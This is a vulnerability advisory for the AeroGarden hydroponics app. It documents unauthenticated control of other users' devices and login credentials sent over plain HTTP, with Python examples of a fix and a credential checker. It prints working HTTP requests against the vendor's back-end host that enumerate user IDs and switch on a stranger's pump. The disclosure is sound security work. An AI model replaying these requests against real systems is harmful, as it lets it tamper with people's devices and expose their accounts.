ADVISORY SUMMARY
AeroGrow International is a company that produces consumer hydroponic growing
hardware for plants (e.g., herbs, vegetables, and flowers). The hardware product can be
controlled with a mobile application for specific models of their hydroponic growing kits.
The company’s official website is http://www.aerogarden.com. The latest version of the
mobile application at the time of disclosure is 1.3.1.
Impact
Both identified vulnerabilities would be detrimental to AeroGarden users; an attacker could cause the devices to inflict damage to plant life or an attacker could capture traffic to access users’ account information.
Risk Level
Medium and High
Affected Vendor
Product Vendor | Product Name | Affected Version
AeroGrow International | AeroGarden | 1.3.1
Vulnerabilities List:
- Incorrect Access Controls
- Insecure Network Transmission
Solution
Incorrect Access Controls: Implement proper access controls for user actions throughout the application.
Insecure Network Transmission: Enforce the use of secure channels for data transmission.
Credits
Jason Gay, Security Associate, Bishop Fox - [email protected]
Timeline
- 02/20/2019: Initial discovery
- 03/21/2019: First attempt to contact vendor
- 04/17/2019: First contact with vendor
- 07/30/2019: Public Disclosure
VULNERABILITIES
Incorrect Access Controls
This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users’ Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote user without authentication.
CVE ID | Security Risk | Impact | Access Vector
N/A | Medium | Incorrect Access Control | Remote
Further Details
- CVSS Base Score: 5.3
- CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
By observing the communication between the mobile application and the Amazon EC2 back end, the testing team found that requests to execute commands on the AeroGarden hardware required only the MAC address (airGuid) of the hardware and the numerical user ID (userID) associated with it. The testing team obtained this information by issuing the following request:
Request
POST /api/Custom/QueryUserDevice HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 12
Accept-Encoding: gzip, deflate
userID=[REDACTED]
The response returned the following information:
Response
[{"configID":[REDACTED],"airGuid":[REDACTED],"lightCycle":"08000100","pumpCycle":"00050037","lightTemp":1,"lightStat":1,"clock":"160503","pumpStat":0,"pumpHydro":0,"pumpTest":1,"pumpDrain":null,"pumpDrainState":null,"pumpLevel":0,"pumpRemind4Hour":0,"gardenType":2,"plantedType":0,"plantedName":"S2l0Y2hlbg==","totalDay":120,"plantedDay":47,"nutriCycle":14,"nutriRemindDay":12,"nutriStatus":0,"alarmAllow":0,"plantedDate":"d2:40:d0:55:94:89","nutrientDate":"[REDACTED]","updateDate":"2019-02-22T02:28:31","createDate":null,"swVersion":"MFW-V0.20","hwVersion":"SW-V1.18","bwVersion":"HW-V3.0","oldPlantedDay":47,"deviceID":"[REDACTED]","deviceIP":"[REDACTED]","chooseGarden":0,"oldlightCycle":null,"vacationMode":0,"bwConnectedSsid":null,"nutriStatusFlag":"0","nutriStatusDate":"0001-01-01T00:00:00","remark":null,"imgUrl":null,"timezone":"0","audioAlarmStat":0,"audioAlarmCycleSet":0,"audioAlarmCycle":null}]
By iterating through the possible five-digit userID values during testing, the team could retrieve the MAC address (airGuid) of various units not under their control. Only these two pieces of information were necessary to issue commands to the hardware.
With this information, an attacker could issue the following command to turn on the water pump for one minute:
POST /api/Custom/UpdateDeviceConfig HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 118
Accept-Encoding: gzip, deflate
airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]
It was confirmed that the unit then ran its pump for one minute. By reviewing different options within the mobile application, different commands could also be issued to alter the light cycle, set vacation mode, or return the devices to their default settings. An attacker could make the motor run until damaged or change options and timing to damage plant life in the system.
No authentication was required for exploitation.
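The following Python is an added illustration of the authorization gap described above and of the fix recommended in the Solution section; it is not code from the advisory or from AeroGrow. It assumes a hypothetical in-memory device table (airGuid mapped to an owning userID) and a hypothetical allow-list of plantConfig keys; the request body it parses has the same shape as the UpdateDeviceConfig request shown above, with constructed airGuid and userID values. The vulnerable handler trusts the airGuid and userID in the body, exactly as the back end did; the hardened handler takes the caller's identity from the authenticated session and checks ownership of the airGuid before applying any change.

```python
import json
from urllib.parse import parse_qs


class Forbidden(Exception):
    """Raised when the caller does not own the device they are trying to control."""


def sample_devices():
    """Constructed stand-in for the back end's device table (hypothetical schema;
    the real one is not on the page). Maps airGuid -> record with its owner userID."""
    return {
        "aa:bb:cc:00:11:22": {"owner": 10001, "pumpTest": 0, "vacationMode": 0},
        "aa:bb:cc:00:33:44": {"owner": 10002, "pumpTest": 0, "vacationMode": 0},
    }


# Settings the app changes through plantConfig (names taken from the response
# shown above; treating this as the server-side allow-list is an assumption).
ALLOWED_CONFIG_KEYS = {"pumpTest", "vacationMode", "lightCycle", "pumpCycle"}


def parse_update_body(body):
    """Parse the x-www-form-urlencoded body of /api/Custom/UpdateDeviceConfig.
    plantConfig is a percent-encoded JSON object, as in the request shown above."""
    fields = parse_qs(body, strict_parsing=True)
    air_guid = fields["airGuid"][0]
    body_user_id = int(fields["userID"][0])
    plant_config = json.loads(fields["plantConfig"][0])
    return air_guid, body_user_id, plant_config


def update_device_config_vulnerable(devices, body):
    """Behaviour described in the advisory: anyone who supplies a valid airGuid
    and userID pair may change the device. No session, no ownership check."""
    air_guid, _body_user_id, plant_config = parse_update_body(body)
    device = devices[air_guid]
    device.update(plant_config)
    return device


def update_device_config_fixed(devices, session_user_id, body):
    """Hardened handler: identity comes from the authenticated session, never
    from the request body, and the caller must own the airGuid being addressed."""
    air_guid, _ignored_body_user_id, plant_config = parse_update_body(body)
    device = devices.get(air_guid)
    # Same error for unknown and not-owned, so the endpoint cannot be used to
    # confirm which airGuids exist.
    if device is None or device["owner"] != session_user_id:
        raise Forbidden("device is not owned by the authenticated user")
    unexpected = set(plant_config) - ALLOWED_CONFIG_KEYS
    if unexpected:
        raise ValueError(f"unexpected plantConfig keys: {sorted(unexpected)}")
    device.update(plant_config)
    return device


# Constructed body in the shape of the UpdateDeviceConfig request shown above:
# an attacker-chosen userID paired with another user's airGuid, pump on for a minute.
ATTACK_BODY = (
    "airGuid=aa%3Abb%3Acc%3A00%3A33%3A44&chooseGarden=0"
    "&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=99999"
)

if __name__ == "__main__":
    devices = sample_devices()
    print("vulnerable:", update_device_config_vulnerable(devices, ATTACK_BODY))
    devices = sample_devices()
    try:
        update_device_config_fixed(devices, 10001, ATTACK_BODY)
    except Forbidden as exc:
        print("fixed:", exc)
```

The fixed handler also refuses unknown configuration keys, so a client cannot push arbitrary fields from the device record (for example the version strings) back into the back end through the same call.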
Insecure Network Transmission
The AeroGarden application transmits not only requests for command execution in cleartext but also the login credentials for the user's account.
CVE ID | Security Risk | Impact | Access Vector
N/A | High | Information Disclosure | Remote
Further Details
- CVSS Base Score: 9.1
- CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
As shown in the Incorrect Access Control issue above, network communication between the mobile application and the Amazon EC2 instance occurs over unencrypted HTTP (port 8080). During testing, the application was observed sending login credentials over this cleartext channel, as shown below:
POST /api/Admin/Login HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 61
Accept-Encoding: gzip, deflate
mail=[REDACTED]&userPwd=[REDACTED]
If an attacker were able to capture this traffic, they could log in to the user’s account on the AeroGarden website and access personal information (such as address and payment information), depending on whether the user has saved this information to the site.
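As an added example (not code from the advisory or from AeroGrow), the following Python shows two checks a practitioner would want around this finding: a small parser that takes a raw HTTP request as captured off the wire and reports which form fields carry credential-like names in the clear, and a client-side guard that refuses to build a request to any origin that is not https://. The sample request is constructed in the shape of the /api/Admin/Login request shown above with placeholder credential values; the field-name pattern used to spot credentials is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Form field names that carry secrets (assumed pattern); any match is flagged
# when the request travelled without TLS.
CREDENTIAL_FIELD = re.compile(r"pass|pwd|secret|token", re.IGNORECASE)

# Constructed sample in the shape of the /api/Admin/Login request shown above;
# the credential values are placeholders, not a real capture.
SAMPLE_LOGIN_REQUEST = (
    "POST /api/Admin/Login HTTP/1.1\r\n"
    "Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 39\r\n"
    "\r\n"
    "mail=user%40example.com&userPwd=hunter2"
)


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body).
    Header names are lower-cased; repeated headers are not needed for this check."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def find_cleartext_credentials(raw, over_tls=False):
    """Names of credential-like form fields exposed on the wire. over_tls records
    whether the bytes came from a decrypted TLS session (then nothing is exposed)."""
    if over_tls:
        return []
    _method, _target, headers, body = parse_http_request(raw)
    content_type = headers.get("content-type", "")
    if not content_type.startswith("application/x-www-form-urlencoded"):
        return []
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(name for name in fields if CREDENTIAL_FIELD.search(name))


def require_https(url):
    """Client-side guard: refuse to build a request to anything but an https://
    origin, so a misconfigured base URL fails at build time instead of on the wire."""
    if urlsplit(url).scheme.lower() != "https":
        raise ValueError(f"refusing cleartext transport: {url}")
    return url


if __name__ == "__main__":
    print(find_cleartext_credentials(SAMPLE_LOGIN_REQUEST))  # ['userPwd']
    try:
        require_https("http://ec2-54-86-39-88.compute-1.amazonaws.com:8080/api/Admin/Login")
    except ValueError as exc:
        print(exc)
```

The same parser can be run over the QueryUserDevice and UpdateDeviceConfig requests shown earlier; they carry no password field, but because they also travel over plain HTTP, the airGuid and userID pairs they contain are just as visible to anyone on the path.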